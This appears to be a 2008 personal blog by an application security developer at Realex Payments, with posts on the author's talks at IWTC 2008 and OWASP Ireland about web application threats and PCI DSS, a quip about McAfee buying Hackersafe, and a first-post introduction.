It is worth noting that in October 2007 McAfee paid $51M (potentially rising to $75M) for hackersafe. The service being provided and those figures remind me of one thing: "This time next year, we'll be millionaires!" (Del Boy, Only Fools and Horses).

Friday, June 6, 2008

My public security talks

This year has been good for me so far for public speaking. I have been lucky enough to be invited to speak at the Irish Web Technology Conference (IWTC 2008) and an OWASP Ireland Chapter Meeting.

I had a lot of fun doing these talks. IWTC was held in the Cineworld cinema in Dublin, and it was a very strange feeling to be presenting my work on the big cinema screen where only weeks earlier I had been watching Shrek!

The IWTC talk focused on a high-level discussion of the current threats application developers need to protect against in 2008. I also discussed how to write code to protect against these threats, and finished off the talk with an explanation of the application security processes I have implemented at Realex Payments.

The talk can be viewed here (Google Docs has broken some of it; contact me for the original):



In April Eoin Keary (OWASP Ireland Chapter Lead) invited me to talk about Application Security and the PCI DSS. The talk focused on how PCI DSS would affect an application developer along with an overall opinion on PCI DSS and how it applies to application security. I presented this talk at Ernst and Young in Dublin.

The talk can be viewed here:



All feedback, good or bad, is welcome!

My first blog!

After reading so much about blogging I thought it was about time I started!

I was inspired to start my blog after my friend Martin mentioned me on his blog (http://brigomp.blogspot.com/). As the blog is in Spanish, all I understood was my own name; fortunately, it was all good.